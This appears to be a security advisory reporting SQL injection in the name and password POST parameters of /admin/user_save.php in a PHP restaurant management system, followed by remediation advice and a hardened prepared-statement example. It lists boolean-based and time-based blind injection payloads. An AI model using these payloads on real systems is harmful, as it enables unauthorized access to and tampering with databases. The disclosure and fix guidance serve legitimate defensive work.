Critical Vulnerability Information

Affected Product
Product Name: Restaurant Management System System V1.0
Vendor Homepage: https://itsourcecode.com/free-projects/php-project/online-restaurant-management-system-project-in-php-with-source-code/
Affected File: /admin/user_save.php
Version: V1.0

Vulnerability Type
Type: SQL Injection

Root Cause
Due to insufficient validation of user input for the parameter, an SQL injection vulnerability exists. Attackers can inject malicious code directly into SQL queries, thereby manipulating queries and performing unauthorized operations.

Impact
Attackers can exploit this SQL injection vulnerability to gain unauthorized database access, leak sensitive data, tamper with data, disrupt system control, and even cause service outages, posing a serious threat to system security and business continuity.

Description
During a security review of the "Restaurant Management System System" project, a critical SQL injection vulnerability was discovered in the file. This vulnerability stems from inadequate validation of the parameter, allowing attackers to inject malicious SQL queries. As a result, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information. Immediate remediation measures are required to ensure system security and protect data integrity.
Vulnerability Details and POC

Vulnerable Parameter: username, name (POST)

Payload:
- Parameter: username (POST)
  - Type: MySQL BLIND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
  - Payload: name=1&password=1' AND (SELECT CASE WHEN (ASCII(SUBSTRING((SELECT CONCAT(0x7e,DB_NAME(),0x7e)),1,1))>126) THEN 1 ELSE 0x28 END) AND 'Aqtv'='Aqtv
  - Type: time-based blind
  - Payload: name=1&password=1' AND (SELECT SLEEP(5))John' AND 'tyTh'='tyTh
- Parameter: name (POST)
  - Type: boolean-based blind
  - Payload: name=1' AND (SELECT CASE WHEN (2307=2307) THEN 1 ELSE 0x28 END) AND 'nDzou'='nDzousername=&password=1
  - Type: time-based blind
  - Payload: name=1' AND (SELECT SLEEP(5))Ezyg' AND 'DKUd'='DKUd

Recommended Remediation
1. Use prepared statements with parameter binding.
2. Implement input validation and filtering.
3. Minimize database user privileges.
4. Conduct regular security audits.
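The following is an added example showing remediation steps 1 and 2 applied to the kind of handler /admin/user_save.php is: it is not the project's code. It assumes the handler inserts a user row from the POST parameters name and password; the table and column names (users, name, password_hash), the connection details and the allowed username pattern are assumptions chosen for the example. The contrast comment shows the concatenation pattern that lets a quote in the name or password value break out of the SQL literal, and the hardened version sends the values through mysqli parameter binding so they can never alter the statement.

```php
<?php
// Added example (not from the project): hardened handling of the POST
// parameters name and password using validation plus mysqli prepared
// statements. Table/column names and connection values are assumptions.
declare(strict_types=1);

// Throw exceptions on database errors instead of silently continuing.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// Placeholder connection details; the account should hold only the
// privileges this script needs (remediation step 3), e.g. INSERT on users.
$db = new mysqli('localhost', 'rms_app', 'PLACEHOLDER_PASSWORD', 'rms');

/*
 * Vulnerable pattern, for contrast only. The single quote in a value such as
 * 1' AND (SELECT SLEEP(5)) ... terminates the literal and the remainder is
 * parsed as SQL:
 *
 *   $sql = "INSERT INTO users (name, password) VALUES ('" . $_POST['name']
 *        . "', '" . $_POST['password'] . "')";
 *   $db->query($sql);
 */

/**
 * Step 2: validate and filter input before it reaches the database layer.
 * The username pattern is an assumption; it rejects quotes, spaces and
 * SQL metacharacters outright.
 */
function validateInput(array $post): array
{
    $name = $post['name'] ?? '';
    $password = $post['password'] ?? '';
    if (!is_string($name) || !preg_match('/^[A-Za-z0-9_.-]{1,32}$/', $name)) {
        throw new InvalidArgumentException('invalid username');
    }
    if (!is_string($password) || strlen($password) < 8 || strlen($password) > 128) {
        throw new InvalidArgumentException('invalid password length');
    }
    return [$name, $password];
}

/**
 * Step 1: prepared statement with parameter binding. The query text is sent
 * to MySQL separately from the values, so quotes, AND clauses or SLEEP()
 * calls inside $name are stored as plain characters, never executed.
 */
function saveUser(mysqli $db, string $name, string $password): int
{
    // Store a hash rather than the raw password (assumed column password_hash).
    $hash = password_hash($password, PASSWORD_DEFAULT);

    $stmt = $db->prepare('INSERT INTO users (name, password_hash) VALUES (?, ?)');
    $stmt->bind_param('ss', $name, $hash);
    $stmt->execute();

    return (int) $stmt->insert_id;
}

try {
    [$name, $password] = validateInput($_POST);
    $id = saveUser($db, $name, $password);
    http_response_code(201);
    echo 'created user ', $id;
} catch (InvalidArgumentException $e) {
    // Reject malformed input with a generic message; log details server-side.
    http_response_code(400);
    echo 'bad request';
}
```

With this structure the blind boolean and time-based payloads listed above are rejected by the pattern check before any query is built, and even a value that passes validation cannot change the prepared statement because it is bound as data rather than spliced into the SQL text.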